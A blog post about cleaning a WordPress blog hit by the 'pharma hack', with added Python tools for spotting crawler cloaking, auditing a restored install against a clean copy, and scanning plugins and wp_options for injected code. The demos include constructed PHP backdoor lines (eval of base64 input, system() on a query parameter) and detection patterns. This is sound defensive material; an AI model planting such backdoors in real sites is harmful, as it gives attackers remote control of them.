On curing a hacked blog

I noticed a recent comment from a visitor that read “You have been hacked with the pharma hack (google “pharma hack”). You can verify this by doing a google search for your domain name.” I thought it was simply a mistake or (ironically!) a spambot, so I deleted it without a second thought. Even so, I did as the commenter suggested – out of idle curiosity more than anything – and discovered that s/he was absolutely correct. So, xensen, whoever you are, thanks. ^_^


As far as I know this blog’s never been a victim of a hacker before, and since it’s been a bit neglected in recent months I’ve done only the bare minimum in terms of upgrades, maintenance and general housekeeping. Since a lot of anime/J-culture bloggers I’m in contact with run on the WordPress platform, I might as well outline my experiences in case it happens to any of you as well.

The WordPress pharma hack doesn’t show itself on the blog’s own pages: the injected spam is served only to search-engine crawlers (the code checks the visitor’s user agent, and in some variants the referer, before deciding what to return), so the blogger and ordinary visitors see a perfectly normal site. Its effects are obvious in the victim’s Google results, though: post titles are replaced with spam ads for pharmacy products, and it can go unnoticed for some time until the blogger sees a drop in site traffic, visitors have trouble finding the blog through search engines, or someone points it out. The quick checks are a site:yourdomain.com search in Google and, if your host gives you a shell, fetching a page with a Googlebot user agent and comparing it with what a browser gets.
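The comparison described above, as an added example (this is not code from the original post or from any of the tools it mentions): fetch the same page twice, once as a browser and once as Googlebot, and report whether the title or the set of links changes. The two HTML responses below are constructed to show what a cloaked page looks like; fetch_as and check_url are there for a live check against a URL you supply. Variants that key on the Referer header rather than the user agent will not be caught by this check.

```python
import re
import urllib.request

# A normal browser UA and Googlebot's published UA string.
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.I | re.S)
LINK_RE = re.compile(r"""<a\s[^>]*href=["']([^"']+)["']""", re.I)


def fetch_as(url, user_agent, timeout=10):
    """Fetch url while presenting user_agent; returns the body as text.
    Only used for a live check; the demo below runs on constructed HTML."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def page_signature(html):
    """The two things the pharma hack rewrites for crawlers: the title and the links."""
    m = TITLE_RE.search(html)
    return {"title": m.group(1).strip() if m else "",
            "links": sorted(set(LINK_RE.findall(html)))}


def compare_views(browser_html, crawler_html):
    """Describe how the crawler's view differs from the browser's.  A title that
    changes only for the crawler, or links only the crawler is shown, is the
    cloaking signature this hack relies on."""
    b, c = page_signature(browser_html), page_signature(crawler_html)
    crawler_only = [link for link in c["links"] if link not in b["links"]]
    return {"browser_title": b["title"],
            "crawler_title": c["title"],
            "title_differs": b["title"] != c["title"],
            "crawler_only_links": crawler_only,
            "cloaked": b["title"] != c["title"] or bool(crawler_only)}


def check_url(url):
    """Live check: the same page fetched twice, once per user agent."""
    return compare_views(fetch_as(url, BROWSER_UA), fetch_as(url, GOOGLEBOT_UA))


# Constructed sample responses, not captured from any real site.
SAMPLE_BROWSER = """<html><head><title>Anime blog - Spring season roundup</title></head>
<body><a href="/2012/01/spring-roundup/">Read more</a></body></html>"""

SAMPLE_CRAWLER = """<html><head><title>Buy Cheap Viagra Online - Anime blog</title></head>
<body><a href="/2012/01/spring-roundup/">Read more</a>
<div style="display:none"><a href="http://example.invalid/cheap-pills">cheap pills</a></div>
</body></html>"""

if __name__ == "__main__":
    for key, value in compare_views(SAMPLE_BROWSER, SAMPLE_CRAWLER).items():
        print(f"{key}: {value}")
```

Run it against a few of your own post URLs rather than just the front page; the hack typically rewrites individual posts, which is why it shows up in search results for specific titles.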

After the initial feelings of panic and “I…I…I’ve been violated…” I looked up the potential cause and what to do about it. I disabled all my plugins, backed up my database and WP directory (when was the last time I did THAT?), deleted all files and folders, re-installed a fresh copy of the WP software and restored the rest piece by piece. I re-uploaded images first, then plugins. The catch with restoring from a backup is that anything taken from the old install – plugins, theme files, even the uploads folder – can carry the infection straight back in, so each piece is worth checking (against a fresh download of the same plugin or theme, where possible) before it goes back.
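One way to check a restored tree before trusting it, as an added example that is not from the original post: hash every file in the restored install and in a freshly downloaded copy, then list core files whose contents differ, files the clean copy doesn’t have at all (plugins, themes, uploads, or a backdoor), and any PHP file sitting under wp-content/uploads, which should only ever contain media. The two directory trees below are constructed in a temporary folder so the script runs on its own; for real use, point audit_install at your restored directory and at an unpacked WordPress download of the same version.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root):
    """Map relative path (with forward slashes) -> sha256 for every file under root."""
    root = Path(root)
    return {str(p.relative_to(root)).replace(os.sep, "/"): sha256_of(p)
            for p in root.rglob("*") if p.is_file()}


def audit_install(restored, clean, upload_dir="wp-content/uploads"):
    """Compare a restored WordPress tree with a clean download of the same version.
    modified_core: files present in both but with different contents.
    not_in_clean_copy: everything the download doesn't ship (your content, or a dropper).
    php_in_uploads: PHP under the uploads directory, which should hold media only."""
    r, c = tree_hashes(restored), tree_hashes(clean)
    modified = sorted(p for p in r if p in c and r[p] != c[p])
    extra = sorted(p for p in r if p not in c)
    php_in_uploads = sorted(p for p in extra
                            if p.startswith(upload_dir + "/") and p.lower().endswith(".php"))
    return {"modified_core": modified,
            "not_in_clean_copy": extra,
            "php_in_uploads": php_in_uploads}


def _write(root, rel, content):
    path = Path(root) / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(content)


def build_demo():
    """Constructed trees (not a real WordPress release): a clean copy and a restore
    with one tampered core file, a legitimate-looking plugin, and a PHP dropper
    hidden among the uploads."""
    clean = tempfile.mkdtemp(prefix="wp-clean-")
    restored = tempfile.mkdtemp(prefix="wp-restored-")
    core = {"index.php": "<?php require 'wp-blog-header.php';\n",
            "wp-includes/load.php": "<?php function wp_load() {}\n"}
    for rel, body in core.items():
        _write(clean, rel, body)
        _write(restored, rel, body)
    # The restored copy of one core file has a backdoor appended.
    _write(restored, "wp-includes/load.php",
           core["wp-includes/load.php"] + "eval(base64_decode($_GET['c']));\n")
    _write(restored, "wp-content/plugins/feedburner/feedburner.php", "<?php // plugin\n")
    _write(restored, "wp-content/uploads/2011/09/image.jpg.php", "<?php system($_GET['x']);\n")
    return restored, clean


if __name__ == "__main__":
    restored, clean = build_demo()
    for key, value in audit_install(restored, clean).items():
        print(f"{key}: {value}")
```

The not_in_clean_copy list is expected to be long on a real blog (every theme, plugin and upload is in it); the point is to read it once and ask whether each entry is something you put there.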

One useful tool in these situations is the Sucuri SiteCheck scanner, which runs a remote scan of the site and reports what sort of nasties are lurking in it. Bear in mind that it only sees what the site serves to the outside, so a clean result is good news but doesn’t prove the files on the server are clean. At the time of writing this blog is clean, but last weekend the scanner picked up a piece of black-hat SEO malware of the sort associated with unwanted/bogus ads. To pinpoint the problem I installed the WordPress Exploit Scanner plugin, which runs through the WP install and highlights lines of code that look malicious and may need removing. It only reports what looks suspicious, so expect some false positives from legitimate plugins; treat each hit as something to read, not as a verdict.

The Exploit Scanner picked out a couple of lines in my FeedBurner plugin that are attributed to the WP pharma hack, so I deleted the offending plugin, ran the Sucuri scanner again and it gave me a clean bill of health. In a way I feel very fortunate in that the source of the problem was a mere plugin, though a word of caution: the plugin is where the payload was living, not necessarily how the attacker got in, and if the actual way in (an outdated install, a vulnerable plugin, a stolen password) is left unfixed the same thing can come straight back. I’ve read horror stories about blogs with infected databases which, with my limited knowledge of SQL, I’d be pretty much at a loss in terms of how to deal with.
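The two places this hack tends to live are plugin/theme files and the wp_options table, so here is an added example covering both; it is not the Exploit Scanner’s code, and the sample plugin files and wp_options rows are constructed for the demonstration. The file scanner flags the patterns that injected loaders rely on (eval of a decoded blob, preg_replace with the /e modifier, long base64 strings, code fetched from a URL, and branching on a crawler’s user agent). The database check is a plain SQL query run here against an in-memory SQLite stand-in with the same column names as the real table; it runs unchanged in phpMyAdmin or the mysql client.

```python
import os
import re
import sqlite3

# Patterns that are rarely legitimate in a plugin or theme and are typical of
# injected loaders.  Every hit is a lead to read, not a verdict: some real
# plugins do call base64_decode or preg_replace, so expect false positives.
SUSPICIOUS = {
    "eval_of_decoded_blob": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "preg_replace_e_modifier": re.compile(
        r"preg_replace\s*\(\s*(['\"]).*?/[A-Za-z]*e[A-Za-z]*\1", re.I),
    "long_base64_blob": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    "remote_code_fetch": re.compile(
        r"(curl_exec|file_get_contents|include|require)\s*\(?\s*['\"]https?://", re.I),
    "crawler_cloaking": re.compile(
        r"HTTP_USER_AGENT.{0,80}(googlebot|bingbot|slurp|yandex)", re.I),
}


def scan_source(name, text):
    """Return (file, line number, pattern label, snippet) for each suspicious line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, rx in SUSPICIOUS.items():
            if rx.search(line):
                hits.append((name, lineno, label, line.strip()[:80]))
    return hits


def scan_tree(root):
    """Scan every .php file under root (for example wp-content/plugins)."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(".php"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as f:
                    hits.extend(scan_source(path, f.read()))
    return hits


def scan_options(conn):
    """Names of wp_options rows whose value contains PHP code or a decoder call.
    Option values are normally URLs, numbers or serialized settings, not code."""
    sql = """SELECT option_name FROM wp_options
             WHERE option_value LIKE '%base64_decode%'
                OR option_value LIKE '%eval(%'
                OR option_value LIKE '%<?php%'
             ORDER BY option_name"""
    return [row[0] for row in conn.execute(sql)]


# Constructed sample plugin files (not real plugin code).
SAMPLE_FILES = {
    "feedburner/feedburner.php": (
        "<?php\n"
        "/* FeedBurner redirect plugin (constructed sample) */\n"
        "function fb_redirect() { return true; }\n"
        "if (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) {\n"
        "    eval(base64_decode('aWYoMSl7ZWNobyAnaGknO30='));\n"
        "}\n"),
    "akismet/akismet.php": (
        "<?php\n"
        "$blog = get_option('home');\n"
        "// nothing odd here\n"),
}


def demo_db():
    """In-memory stand-in for wp_options with one injected row (all rows constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY,"
                 " option_name TEXT, option_value TEXT, autoload TEXT)")
    rows = [
        ("siteurl", "http://example.invalid", "yes"),
        ("blogname", "Anime blog", "yes"),
        ("active_plugins", 'a:1:{i:0;s:19:"akismet/akismet.php";}', "yes"),
        ("rss_7f1c2a", 'a:1:{s:4:"code";s:33:"eval(base64_decode($_POST[\'p\']));";}', "yes"),
    ]
    conn.executemany("INSERT INTO wp_options (option_name, option_value, autoload)"
                     " VALUES (?, ?, ?)", rows)
    return conn


if __name__ == "__main__":
    for name, text in SAMPLE_FILES.items():
        for hit in scan_source(name, text):
            print(hit)
    print("suspicious options:", scan_options(demo_db()))
```

When a hit in wp_options is genuine, deleting the row is usually enough, but look at the autoload column too: rows set to autoload run on every page load, which is exactly why the hack puts its loader there.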

In all honesty I don’t feel the need for the FeedBurner plugin anyway – a lot of my site promotion comes from GRSI (now Google+) or Twitter; I don’t *think* removing FeedBurner broke my RSS feed, but you might want to re-subscribe to this blog in your feedreader, just in case. All this seems to have done in the long run is eat up a Saturday while I was trying to familiarise myself with this little beastie of a hack and re-install my blog, but since I’ve used it as an excuse to start playing around with a new theme/layout it’s not all bad. I’ve also learned a few things:

  1. Regularly back up your database, themes, uploads and anything else important that’s unique to your blog’s install (duh!). That includes wp-config.php (which holds your database credentials and secret keys, so keep the backup somewhere that isn’t web-accessible) and the .htaccess file.
  2. Change your password periodically (duh!), and after a compromise change all of them at once – the WordPress admin account, the FTP/SFTP and hosting control panel logins and the database user – since you don’t know which one the attacker has.
  3. Install only as many plugins as you need. Newer versions of WordPress have more stuff already included, but some things, like anti-spam plugins, are essential. Each plugin is a potential target for a hacker, and one that its developer has abandoned won’t get patches at all. Keep the ones you do use updated, in case the developers come up with patches for security issues.
  4. Keep tabs on your Google search results and site traffic. Sudden increases and decreases in hits are worth looking into, especially when you have a regular posting schedule (I don’t, but still…).

I now have the new (Twenty Eleven) theme installed with some pretty-shiny new banner images, and a long to-do list for upcoming posts and tweaks to the layout. Last weekend actually reminded me about how fun maintaining (not just writing) a blog can be so I now have a few things lined up. The SF episodic story thing I was working on over on the main site will continue (when I’ve spring-cleaned and checked that WP installation too, natch) and at some point I’ll upload the rest of the photos from last September’s Japan trip onto Flickr. I want 2012 to be a productive year, whether the Mayans (or Roland Emmerich) were right about the imminent apocalypse or not.

4 thoughts on “On curing a hacked blog”

  1. Thanks for the tips! That sounds like a handy tool. My host emailed me not too long ago to say I was compromised, but they got in through WP’s xmlrpc.php file (which allows remote publishing, mobile apps, etc, to work).
